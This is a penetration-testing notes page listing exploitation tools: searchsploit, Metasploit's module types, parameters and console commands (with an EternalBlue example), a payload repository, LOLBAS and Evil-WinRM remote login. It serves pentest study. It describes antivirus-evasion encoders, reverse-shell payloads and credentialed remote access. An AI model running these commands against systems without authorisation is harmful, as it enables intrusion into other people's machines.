Tools and Utilities

Here we can find some tools and utilities commonly used for processes related to exploitation:

Exploit DB

Searchsploit

  • Kali package for acceding to exploitDB

Commands

  • Installation

sudo apt install exploitdb

  • Usage

searchsploit $Keywords

Metasploit

  • Exploitation framework with tools for every phase of pen-testing

Modules

  • Auxiliary: Any supporting module

  • Encoders: Encode exploit and payload for bypassing signature-based antivirus

  • Evasion: For antivirus evasion

  • Exploits: Exploits, organized by target system

  • Nops: No Operation, CPU will do nothing for one cycle, often used as a buffer to achieve consistent payload sizes

  • Payloads: Different payloads that can open shells on the target system

    • Adapters: Convert single payloads into different form

    • Single: Also called in-line, do not need to download an additional component to run.

    • Stagers: Set up a connection channel between Metasploit and the target system. First, the stager is uploaded on the target system and then it downloads the rest of the payload (stage)

    • Stages: Downloaded by the stager, allows to use larger-sized payloads

  • Post: For post-exploitation

The difference between staged and single payloads is the use of _ or / in notation

Example: shell_reverse_tcp (Single) ---shell/reverse_tcp (Staged)

Common parameters

  • RHOSTS: IP address of the target system

  • RPORT: Port on the target system the vulnerable application is running on

  • PAYLOAD: Payload that will be used with the exploit

  • LHOST: Attacking machine (local) IP address

  • LPORT: Port (local) that will be used for the reverse shell to connect back to

  • SESSION: Session ID of the connection with Metasploit. Used with post-exploitation modules connected to the target system

Commands

  • Installation

sudo apt install metasploit-framework

  • Start the console

msfconsole
msf6\> sessions        #See all sessions
msf6\> session -i $id  #Change to a session

  • List modules

tree -L 1 /usr/share/metasploit-framework/modules        #Types
tree -L 1 /usr/share/metasploit-framework/modules/$type  #Specific module type

  • Search module

msf6\> search $query
msf6\> use $queryNumber #Use module from last search list (0 is the first)
msf6 > search type:$type $query #Filter by specific module type

The query value can be a keyword, CVE number, exploit/module name, or target system

  • Usage

msf6\> use exploit/$exploit path
# This will enter in context of the exploit, below is an example
msf6\> use exploit/windows/smb/ms17_010_eternalblue     #The exploit used
msf6 exploit(windows/smb/ms17_010_eternalblue)\>        #The terminal context set

'''\> info             #Display information about the module (''')
'''\> show options     #Display options for the actual context 
'''\> show payloads    #Display payloads that can be used with the exploit
'''\> show $module     #Can be used with every module type

'''\> set $parameter $value  #Set parameters in context
'''\> unset $parameter       #Unset a parameter
'''\> unset all              #Unset all parameters
'''\> setg $parameter $value #Set parameters globally
'''\> unsetg $parameter      #Unset global parameter

'''\> check       #Verify if vulnerable without exploiting
'''\> exploit     #Run exploit
'''\> run         #Same that exploit
'''\> exploit -z  #Run exploit and background session
'''\> background  #Background session, also CTLR+Z can be used
'''\> back        #Exit from context

meterpreter > $commands #Once accessed an exploit, the terminal will change to meterpreter and here we apply the commands of the spectific module

Payloads for Everything

A repository that contains payloads for diverse purposes and attacks

LOLBAS

Evil-WinRM

Tool to connect remotely to a Windows WinRM instance

  • Install

sudo apt install evil-winrm

  • Access to WinRM

sudo evil-winrm -i $ip -u $user -p $password
PreviousExploitationNextUseful Tips

Last updated

Was this helpful?